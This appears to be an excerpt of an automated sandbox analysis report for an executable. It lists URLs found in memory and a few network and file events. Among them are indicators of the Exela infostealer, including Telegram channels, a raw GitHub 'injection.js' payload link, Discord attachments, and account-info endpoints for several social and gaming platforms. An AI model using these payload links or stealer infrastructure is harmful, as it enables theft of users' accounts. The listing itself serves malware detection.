Source: 9afaXJv52z.exe, 00000002.00000003.1258920487.0000020DAB9A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: 9afaXJv52z.exe, 00000002.00000003.1559277843.0000020DAB99B000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1565010264.0000020DAB9B8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258719819.0000020DAB9BB000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1552282326.0000020DAB99A000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1257221376.0000020DAD671000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1560322724.0000020DAB9B7000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1550721004.0000020DAB98A000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258920487.0000020DAB9A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: 9afaXJv52z.exe, 00000002.00000002.1571769421.0000020DADFC9000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543495098.0000020DADFC6000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADF4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/pull/28073
Source: 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADF4C000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548453854.0000020DAE6D8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE27000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1556804989.0000020DAE6D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/quicaxd/Exela-V2.0
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/quicaxd/Exela-V2.0/Exela-V2.0
Source: METADATA.0.dr	String found in binary or memory: https://github.com/sponsors/hynek
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://github.com/sponsors/hynek).
Source: 9afaXJv52z.exe, 00000002.00000003.1559277843.0000020DAB99B000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1565010264.0000020DAB9B8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258719819.0000020DAB9BB000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1552282326.0000020DAB99A000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1257221376.0000020DAD671000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1560322724.0000020DAB9B7000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1550721004.0000020DAB98A000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258920487.0000020DAB9A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADF4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/VnJMg5)
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gql.twitch.tv/gql
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://hatch.pypa.io/latest/).
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://hynek.me/articles/import-attrs/)
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i.hizliresim.com/8po0puy.jfif
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i.hizliresim.com/eai9bwi.jpg
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i.hizliresim.com/qxnzimj.jpg
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i.instagram.com/api/v1/accounts/current_user/?edit=true
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i.instagram.com/api/v1/users/
Source: 9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	String found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://instagram.com/
Source: 9afaXJv52z.exe, 00000002.00000003.1535135735.0000020DADFFE000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1557436843.0000020DAE007000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1557853052.0000020DAE012000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: 9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	String found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
Source: 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADF4C000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548453854.0000020DAE6D8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1556804989.0000020DAE6D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://media.discordapp.net/attachments/1133692440029700117/1140245373496074270/195198d656ec1e2b59a
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://media.discordapp.net/attachments/1145679170127532095/1145756091553173696/3-min-5.jpg
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oauth.reddit.com/api/v1/me
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://open.spotify.com/user/
Source: 9afaXJv52z.exe, 00000002.00000002.1568871055.0000020DAD770000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246273602.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://peps.python.org/pep-0681/)
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://pypi.org/project/attrs/)
Source: 9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	String found in binary or memory: https://pypi.org/project/cryptography/
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/justforExela/injection/main/injection.js
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/FilePreviews.svg
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Sentry.svg
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Tidelift.svg
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Variomedia.svg
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg
Source: 9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	String found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://sentry.io/
Source: 9afaXJv52z.exe, 00000000.00000003.1246713889.00000170C08EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246388423.00000170C08EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246295929.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://stackoverflow.com/questions/tagged/python-attrs)
Source: 9afaXJv52z.exe, 00000002.00000003.1362518016.0000020DB081F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 9afaXJv52z.exe, 00000002.00000003.1362518016.0000020DB081F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ExelaStealea
Source: 9afaXJv52z.exe, 00000002.00000003.1556804989.0000020DAE6D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ExelaStealer
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ExelaStealer----------------------
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ExelaStealer-------p
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.meZ
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thumbnails.roblox.com/v1/users/avatar?userIds=
Source: 9afaXJv52z.exe, 00000000.00000003.1246713889.00000170C08EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246388423.00000170C08EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246295929.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tidelift.com/subscripti
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
Source: METADATA.0.dr	String found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=referral&utm_campa
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiktok.com/
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/home
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.json
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap
Source: 9afaXJv52z.exe, 00000000.00000003.1247580506.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.apache.org/licenses/
Source: 9afaXJv52z.exe, 00000000.00000003.1247580506.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1247653162.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1247533508.00000170C08F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: METADATA.0.dr	String found in binary or memory: https://www.attrs.org/
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://www.attrs.org/)
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
Source: 9afaXJv52z.exe, 00000000.00000003.1246713889.00000170C08EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246388423.00000170C08EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246295929.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://www.attrs.org/en/latest/license.html)
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://www.attrs.org/en/latest/names.html)
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://www.attrs.org/en/stable/changelog.html
Source: METADATA.0.dr	String found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization).
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes).
Source: 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08F2000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 9afaXJv52z.exe, 00000002.00000003.1362518016.0000020DB081F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: 9afaXJv52z.exe, 00000002.00000002.1565399042.0000020DAD470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: 9afaXJv52z.exe, 00000002.00000003.1362518016.0000020DB081F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: 9afaXJv52z.exe, 00000002.00000003.1362518016.0000020DB081F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: 9afaXJv52z.exe, 00000002.00000003.1362518016.0000020DB081F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 9afaXJv52z.exe, 00000002.00000003.1362518016.0000020DB081F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: 9afaXJv52z.exe, 00000002.00000003.1535135735.0000020DADFFE000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1557436843.0000020DAE007000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1557853052.0000020DAE012000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/
Source: 9afaXJv52z.exe, 00000002.00000002.1565167633.0000020DAD230000.00000004.00001000.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1258773956.0000020DAD716000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/user/
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.roblox.com/my/account/json
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
Source: 9afaXJv52z.exe, 00000002.00000003.1543162548.0000020DAE862000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548074284.0000020DADE73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.twitch.tv/
Source: 9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	String found in binary or memory: https://www.variomedia.de/
Source: 9afaXJv52z.exe, 00000002.00000003.1557790883.0000020DAD9D0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1549460513.0000020DAD9CF000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1271340461.0000020DAD8B7000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1569893970.0000020DAD9D0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548937201.0000020DAD8EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1551014490.0000020DAD9D0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1551721234.0000020DAD9D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zopeinterface.readthedocs.io/en/latest/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

